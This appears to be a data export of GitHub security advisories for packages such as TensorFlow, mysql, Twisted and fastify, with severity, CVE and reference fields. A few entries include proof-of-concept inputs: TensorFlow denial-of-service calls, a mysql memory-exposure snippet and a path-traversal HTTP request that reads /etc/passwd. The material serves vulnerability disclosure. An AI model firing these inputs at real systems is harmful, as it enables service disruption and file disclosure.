GHSA | GHSA-5h6m-9mvx-m6c5 | Moderate severity vulnerability that affects mayan-edms | An issue was discovered in Mayan EDMS before 3.0.3. The Tags app has XSS because tag label values are mishandled. | {'CVE-2018-16407'} | 2021-09-01T22:13:59Z | 2018-09-06T03:25:03Z | MODERATE | 6.1 | {'CWE-79'} | {'https://gitlab.com/mayan-edms/mayan-edms/blob/master/HISTORY.rst', 'https://gitlab.com/mayan-edms/mayan-edms/issues/496', 'https://github.com/advisories/GHSA-5h6m-9mvx-m6c5', 'https://gitlab.com/mayan-edms/mayan-edms/commit/076468a9225e4630a463c0bbceb8e5b805fe380c', 'https://nvd.nist.gov/vuln/detail/CVE-2018-16407'} | null |
GHSA | GHSA-cq94-qf6q-mf2h | Moderate severity vulnerability that affects pysaml2 | Python package pysaml2 version 4.4.0 and earlier reuses the initialization vector across encryptions in the IDP server, resulting in weak encryption of data. | {'CVE-2017-1000246'} | 2021-09-09T20:21:11Z | 2018-07-16T16:50:30Z | MODERATE | 5.3 | {'CWE-330'} | {'https://nvd.nist.gov/vuln/detail/CVE-2017-1000246', 'https://github.com/advisories/GHSA-cq94-qf6q-mf2h', 'https://github.com/rohe/pysaml2/issues/417'} | null |
GHSA | GHSA-xr3g-4gg5-w3wq | Malicious Package in degbu | All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | null | 2021-10-01T21:00:58Z | 2020-09-03T17:06:14Z | CRITICAL | 9.1 | {'CWE-506'} | {'https://www.npmjs.com/advisories/1393', 'https://github.com/advisories/GHSA-xr3g-4gg5-w3wq'} | null |
GHSA | GHSA-6j9c-grc6-5m6g | CHECK-fail in SparseConcat | ### Impact
An attacker can trigger a denial of service via a `CHECK`-fail in `tf.raw_ops.SparseConcat`:
```python
import tensorflow as tf
import numpy as np
indices_1 = tf.constant([[514, 514], [514, 514]], dtype=tf.int64)
indices_2 = tf.constant([[514, 530], [599, 877]], dtype=tf.int64)
indices = [indices_1, indices_2]
values_1 = tf.zeros([0], dtype=tf.int64)
values_2 = tf.zeros([0], dtype=tf.int64)
values = [values_1, values_2]
shape_1 = tf.constant([442, 514, 514, 515, 606, 347, 943, 61, 2], dtype=tf.int64)
shape_2 = tf.zeros([9], dtype=tf.int64)
shapes = [shape_1, shape_2]
tf.raw_ops.SparseConcat(indices=indices, values=values, shapes=shapes, concat_dim=2)
```
This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/b432a38fe0e1b4b904a6c222cbce794c39703e87/tensorflow/core/kernels/sparse_concat_op.cc#L76) takes the values specified in `shapes[0]` as dimensions for the output shape:
```cc
TensorShape input_shape(shapes[0].vec<int64>());
```
The [`TensorShape` constructor](https://github.com/tensorflow/tensorflow/blob/6f9896890c4c703ae0a0845394086e2e1e523299/tensorflow/core/framework/tensor_shape.cc#L183-L188) uses a `CHECK` operation which triggers when [`InitDims`](https://github.com/tensorflow/tensorflow/blob/6f9896890c4c703ae0a0845394086e2e1e523299/tensorflow/core/framework/tensor_shape.cc#L212-L296) returns a non-OK status.
```cc
template <class Shape>
TensorShapeBase<Shape>::TensorShapeBase(gtl::ArraySlice<int64> dim_sizes) {
set_tag(REP16);
set_data_type(DT_INVALID);
TF_CHECK_OK(InitDims(dim_sizes));
}
```
In our scenario, this occurs when adding a dimension from the argument results in overflow:
```cc
template <class Shape>
Status TensorShapeBase<Shape>::InitDims(gtl::ArraySlice<int64> dim_sizes) {
...
Status status = Status::OK();
for (int64 s : dim_sizes) {
status.Update(AddDimWithStatus(internal::SubtleMustCopy(s)));
if (!status.ok()) {
return status;
}
}
}
template <class Shape>
Status TensorShapeBase<Shape>::AddDimWithStatus(int64 size) {
...
int64 new_num_elements;
if (kIsPartial && (num_elements() < 0 || size < 0)) {
new_num_elements = -1;
} else {
new_num_elements = MultiplyWithoutOverflow(num_elements(), size);
if (TF_PREDICT_FALSE(new_num_elements < 0)) {
return errors::Internal("Encountered overflow when multiplying ",
num_elements(), " with ", size,
", result: ", new_num_elements);
}
}
...
}
```
This is a legacy implementation of the constructor and operations should use `BuildTensorShapeBase` or `AddDimWithStatus` to prevent `CHECK`-failures in the presence of overflows.
### Patches
We have patched the issue in GitHub commit [69c68ecbb24dff3fa0e46da0d16c821a2dd22d7c](https://github.com/tensorflow/tensorflow/commit/69c68ecbb24dff3fa0e46da0d16c821a2dd22d7c).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team. | {'CVE-2021-29534'} | 2021-05-21T14:22:24Z | 2021-05-21T14:22:24Z | LOW | 2.5 | {'CWE-754'} | {'https://github.com/tensorflow/tensorflow/commit/69c68ecbb24dff3fa0e46da0d16c821a2dd22d7c', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-6j9c-grc6-5m6g', 'https://github.com/advisories/GHSA-6j9c-grc6-5m6g', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29534'} | null |
GHSA | GHSA-5f7m-mmpc-qhh4 | Remote Memory Exposure in mysql | Versions of `mysql` before 2.14.0 are vulnerable to remove memory exposure.
Affected versions of `mysql` package allocate and send an uninitialized memory over the network when a number is provided as a password.
Only `mysql` running on Node.js versions below 6.0.0 is affected due to a throw added in newer node.js versions.
Proof of Concept:
```
require('mysql').createConnection({
host: 'localhost',
user: 'user',
password : USERPROVIDEDINPUT, // number
database : 'my_db'
}).connect();
```
## Recommendation
Update to version 2.14.0 or later. | null | 2021-08-04T15:50:29Z | 2019-05-23T09:27:00Z | MODERATE | 0 | {'CWE-201'} | {'https://github.com/advisories/GHSA-5f7m-mmpc-qhh4', 'https://nodesecurity.io/advisories/602', 'https://github.com/mysqljs/mysql/commit/310c6a7d1b2e14b63b572dbfbfa10128f20c6d52', 'https://www.npmjs.com/advisories/602'} | null |
GHSA | GHSA-rrfc-g2gh-xvjm | Directory Traversal in 22lixian | Affected versions of `22lixian` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
Example request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead. | {'CVE-2017-16162'} | 2021-01-08T01:57:48Z | 2018-07-23T20:46:07Z | HIGH | 0 | {'CWE-22'} | {'https://github.com/advisories/GHSA-rrfc-g2gh-xvjm', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16162', 'https://www.npmjs.com/advisories/390', 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/22lixian', 'https://nodesecurity.io/advisories/390'} | null |
GHSA | GHSA-jv35-xqg7-f92r | Prototype Pollution | Prototype pollution vulnerability in ‘set-getter’ version 0.1.0 allows an attacker to cause a denial of service and may lead to remote code execution. | {'CVE-2021-25949'} | 2021-10-21T13:11:55Z | 2021-06-21T17:16:09Z | CRITICAL | 9.8 | {'CWE-1321'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-25949', 'https://github.com/doowb/set-getter/commit/66eb3f0d4686a4a8c7c3d6f7ecd8e570b580edc4', 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25949', 'https://github.com/doowb/set-getter/blob/5bc2750fe1c3db9651d936131be187744111378d/index.js#L56', 'https://github.com/advisories/GHSA-jv35-xqg7-f92r'} | null |
GHSA | GHSA-32gv-6cf3-wcmq | HTTP/2 DoS Attacks: Ping, Reset, and Settings Floods | ### Impact
Twisted web servers that utilize the optional HTTP/2 support suffer from the following flow-control related vulnerabilities:
Ping flood: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9512
Reset flood: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9514
Settings flood: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9515
A Twisted web server supports HTTP/2 requests if you've installed the [`http2` optional dependency set](https://twistedmatrix.com/documents/19.2.0/installation/howto/optional.html).
### Workarounds
There are no workarounds.
### References
https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-002.md
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Twisted's Trac](https://twistedmatrix.com/trac/)
| null | 2022-04-19T19:03:22Z | 2022-03-14T22:45:11Z | CRITICAL | 0 | null | {'https://github.com/advisories/GHSA-32gv-6cf3-wcmq', 'https://github.com/twisted/twisted/security/advisories/GHSA-32gv-6cf3-wcmq'} | null |
GHSA | GHSA-ghhp-997w-qr28 | .NET Core Remote Code Execution Vulnerability | .NET Core Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-24112.
### Executive summary
Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 5.0, .NET Core 3.1, and .NET Core 2.1. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.
A remote code execution vulnerability exists in .NET 5 and .NET Core due to how text encoding is performed.
### Discussion
Discussion for this issue can be found at dotnet/runtime#49377
### Mitigation factors
Microsoft has not identified any mitigating factors for this vulnerability.
### Affected software
The vulnerable package is `System.Text.Encodings.Web` . Upgrading your package and redeploying your app should be sufficient to address this vulnerability.
Vulnerable package versions:
Any .NET 5, .NET Core, or .NET Framework based application that uses the System.Text.Encodings.Web package with a vulnerable version listed below.
Package Name | Vulnerable Versions | Secure Versions
-|-|-
System.Text.Encodings.Web | 4.0.0 - 4.5.0 | 4.5.1
System.Text.Encodings.Web | 4.6.0-4.7.1 | 4.7.2
System.Text.Encodings.Web | 5.0.0 | 5.0.1
Please validate that each of the .NET versions you are using is in support. Security updates are only provided for supported .NET versions.
| {'CVE-2021-26701'} | 2021-04-21T19:38:01Z | 2021-04-21T19:38:01Z | CRITICAL | 9.8 | null | {'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YLFATXASXW4OV2ZBSRP4G55HJH73QPBP/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XPUKFHIGP5YNJRRFWKDJ2XRS4WTFJNNK/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TW3ZSJTTMZAFKGW7NJWTVVFZUYYU2SJZ/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-26701', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UBOSSX7U6BSHV5RI74FCOW4ITJ5RRJR5/', 'https://github.com/advisories/GHSA-ghhp-997w-qr28', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S2AZOUKMCHT2WBHR7MYDTYXWOBHZW5P5/', 'https://github.com/dotnet/announcements/issues/178', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26701', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WA5WQJVHUL5C4XMJTLY3C67R4WP35EF4/'} | null |
GHSA | GHSA-ccq6-3qx5-vmqx | Moderate severity vulnerability that affects is-my-json-valid | Withdrawn, accidental duplicate publish.
The is-my-json-valid package before 2.12.4 for Node.js has an incorrect exports['utc-millisec'] regular expression, which allows remote attackers to cause a denial of service (blocked event loop) via a crafted string. | null | 2021-12-02T23:07:38Z | 2018-07-31T22:54:14Z | MODERATE | 0 | null | {'https://nvd.nist.gov/vuln/detail/CVE-2016-2537', 'https://github.com/advisories/GHSA-ccq6-3qx5-vmqx'} | null |
GHSA | GHSA-fh39-v733-mxfr | Moderate severity vulnerability that affects activerecord | The Active Record component in Ruby on Rails 3.0.x before 3.0.13, 3.1.x before 3.1.5, and 3.2.x before 3.2.4 does not properly implement the passing of request data to a where method in an ActiveRecord class, which allows remote attackers to conduct certain SQL injection attacks via nested query parameters that leverage unintended recursion, a related issue to CVE-2012-2695. | {'CVE-2012-2661'} | 2021-09-10T18:17:39Z | 2017-10-24T18:33:38Z | MODERATE | 0 | {'CWE-89'} | {'https://github.com/advisories/GHSA-fh39-v733-mxfr', 'https://nvd.nist.gov/vuln/detail/CVE-2012-2661', 'http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00016.html', 'http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00014.html', 'https://groups.google.com/group/rubyonrails-security/msg/fc2da6c627fc92df?dmode=source&output=gplain', 'http://lists.opensuse.org/opensuse-updates/2012-08/msg00046.html', 'http://rhn.redhat.com/errata/RHSA-2013-0154.html'} | null |
GHSA | GHSA-92x2-jw7w-xvvx | Cookie and header exposure in twisted | ### Impact
Cookie and Authorization headers are leaked when following cross-origin redirects in `twited.web.client.RedirectAgent` and `twisted.web.client.BrowserLikeRedirectAgent`. | {'CVE-2022-21712'} | 2022-04-25T07:14:43Z | 2022-02-07T22:36:00Z | HIGH | 7.5 | {'CWE-200', 'CWE-346'} | {'https://github.com/twisted/twisted/releases/tag/twisted-22.1.0', 'https://github.com/twisted/twisted/commit/af8fe78542a6f2bf2235ccee8158d9c88d31e8e2', 'https://github.com/twisted/twisted/security/advisories/GHSA-92x2-jw7w-xvvx', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21712', 'https://github.com/advisories/GHSA-92x2-jw7w-xvvx', 'https://lists.debian.org/debian-lts-announce/2022/02/msg00021.html'} | null |
GHSA | GHSA-8j4w-5fw4-rm27 | Prototype Pollution in deeply | Versions of `deeply` prior to 1.0.1 are vulnerable to Prototype Pollution. The package fails to validate which Object properties it updates. This allows attackers to modify the prototype of Object, causing the addition or modification of an existing property on all objects.
## Recommendation
Upgrade to version 3.1.0 or later. | {'CVE-2019-10750'} | 2021-08-17T22:18:26Z | 2019-08-27T17:45:33Z | CRITICAL | 9.8 | {'CWE-400'} | {'https://snyk.io/vuln/SNYK-JS-DEEPLY-451026', 'https://github.com/advisories/GHSA-8j4w-5fw4-rm27', 'https://www.npmjs.com/advisories/1030', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10750'} | null |
GHSA | GHSA-px4w-rcv2-6x8x | Arbitrary code execution in Apache ServiceComb java-chassis | When handler-router component is enabled in servicecomb-java-chassis, authenticated user may inject some data and cause arbitrary code execution.
The problem happens in versions between 2.0.0 ~ 2.1.3 and fixed in Apache ServiceComb-Java-Chassis 2.1.5 | {'CVE-2020-17532'} | 2022-02-09T22:19:00Z | 2022-02-09T22:19:00Z | HIGH | 8.8 | {'CWE-502'} | {'https://github.com/apache/servicecomb-java-chassis/commit/ba4fb37b6ab8bd3a6c3d0693f295d99a94879838', 'https://nvd.nist.gov/vuln/detail/CVE-2020-17532', 'https://github.com/advisories/GHSA-px4w-rcv2-6x8x', 'https://seclists.org/oss-sec/2021/q1/60', 'https://issues.apache.org/jira/browse/SCB-2145', 'https://github.com/apache/servicecomb-java-chassis/commit/839a52e27c754cb5ce14f20063902f21065bd26c'} | null |
GHSA | GHSA-mq6c-fh97-4gwv | Denial of Service vulnerability with large JSON payloads in fastify | Affected versions of `fastify` are vulnerable to a denial of service when processing a request with `Content-Type` set to `application/json` and a very large payload.
## Recommendation
Update to version 0.38.0 or later. | {'CVE-2018-3711'} | 2022-04-19T19:03:25Z | 2018-07-18T21:20:34Z | HIGH | 0 | {'CWE-770'} | {'https://github.com/advisories/GHSA-mq6c-fh97-4gwv', 'https://hackerone.com/reports/303632', 'https://github.com/fastify/fastify/commit/fabd2a011f2ffbb877394abe699f549513ffbd76', 'https://www.npmjs.com/advisories/564', 'https://nvd.nist.gov/vuln/detail/CVE-2018-3711', 'https://github.com/fastify/fastify/pull/627'} | null |
GHSA | GHSA-vpj4-89q8-rh38 | Cross-Site Scripting in bpmn-js-properties-panel | Versions of `bpmn-js-properties-panel` prior to 0.31.0 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize input in specially configured diagrams, which may allow attackers to inject arbitrary JavaScript in the embedding website.
## Recommendation
Upgrade to version 0.31.0 or later. | null | 2021-09-29T15:17:34Z | 2020-09-03T18:16:59Z | HIGH | 0 | {'CWE-79'} | {'https://github.com/advisories/GHSA-vpj4-89q8-rh38', 'https://www.npmjs.com/advisories/1079'} | null |
GHSA | GHSA-c582-c96p-r5cq | Memory exhaustion in Tensorflow | ### Impact
The [implementation of `ThreadPoolHandle`](https://github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/kernels/data/experimental/threadpool_dataset_op.cc#L79-L135) can be used to trigger a denial of service attack by allocating too much memory:
```python
import tensorflow as tf
y = tf.raw_ops.ThreadPoolHandle(num_threads=0x60000000,display_name='tf')
```
This is because the `num_threads` argument is only checked to not be negative, but there is no upper bound on its value.
### Patches
We have patched the issue in GitHub commit [e3749a6d5d1e8d11806d4a2e9cc3123d1a90b75e](https://github.com/tensorflow/tensorflow/commit/e3749a6d5d1e8d11806d4a2e9cc3123d1a90b75e).
The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by Yu Tian of Qihoo 360 AIVul Team. | {'CVE-2022-21732'} | 2022-02-11T17:05:43Z | 2022-02-10T00:20:29Z | MODERATE | 4.3 | {'CWE-400', 'CWE-770'} | {'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-c582-c96p-r5cq', 'https://github.com/advisories/GHSA-c582-c96p-r5cq', 'https://github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/kernels/data/experimental/threadpool_dataset_op.cc#L79-L135', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21732', 'https://github.com/tensorflow/tensorflow/commit/e3749a6d5d1e8d11806d4a2e9cc3123d1a90b75e'} | null |
GHSA | GHSA-74fj-2j2h-c42q | Exposure of sensitive information in follow-redirects | follow-redirects is vulnerable to Exposure of Private Personal Information to an Unauthorized Actor | {'CVE-2022-0155'} | 2022-01-20T15:34:49Z | 2022-01-12T22:46:26Z | HIGH | 8 | {'CWE-359'} | {'https://github.com/follow-redirects/follow-redirects/commit/8b347cbcef7c7b72a6e9be20f5710c17d6163c22', 'https://huntr.dev/bounties/fc524e4b-ebb6-427d-ab67-a64181020406', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0155', 'https://github.com/advisories/GHSA-74fj-2j2h-c42q'} | null |
GHSA | GHSA-9p77-mmrw-69c7 | Null-dereference in Tensorflow | ### Impact
When decoding a tensor from protobuf, TensorFlow might do a null-dereference if attributes of some mutable arguments to some operations are missing from the proto. This is [guarded by a `DCHECK`](https://github.com/tensorflow/tensorflow/blob/a1320ec1eac186da1d03f033109191f715b2b130/tensorflow/core/framework/full_type_util.cc#L104-L106):
```cc
const auto* attr = attrs.Find(arg->s());
DCHECK(attr != nullptr);
if (attr->value_case() == AttrValue::kList) {
// ...
}
```
However, `DCHECK` is a no-op in production builds and an assertion failure in debug builds. In the first case execution proceeds to the dereferencing of the null pointer, whereas in the second case it results in a crash due to the assertion failure.
### Patches
We have patched the issue in GitHub commit [8a513cec4bec15961fbfdedcaa5376522980455c](https://github.com/tensorflow/tensorflow/commit/8a513cec4bec15961fbfdedcaa5376522980455c).
The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, and TensorFlow 2.6.3, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. | {'CVE-2022-23570'} | 2022-02-11T20:48:51Z | 2022-02-09T23:33:35Z | MODERATE | 6.5 | {'CWE-476'} | {'https://github.com/tensorflow/tensorflow/blob/a1320ec1eac186da1d03f033109191f715b2b130/tensorflow/core/framework/full_type_util.cc#L104-L106', 'https://nvd.nist.gov/vuln/detail/CVE-2022-23570', 'https://github.com/advisories/GHSA-9p77-mmrw-69c7', 'https://github.com/tensorflow/tensorflow/commit/8a513cec4bec15961fbfdedcaa5376522980455c', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-9p77-mmrw-69c7'} | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.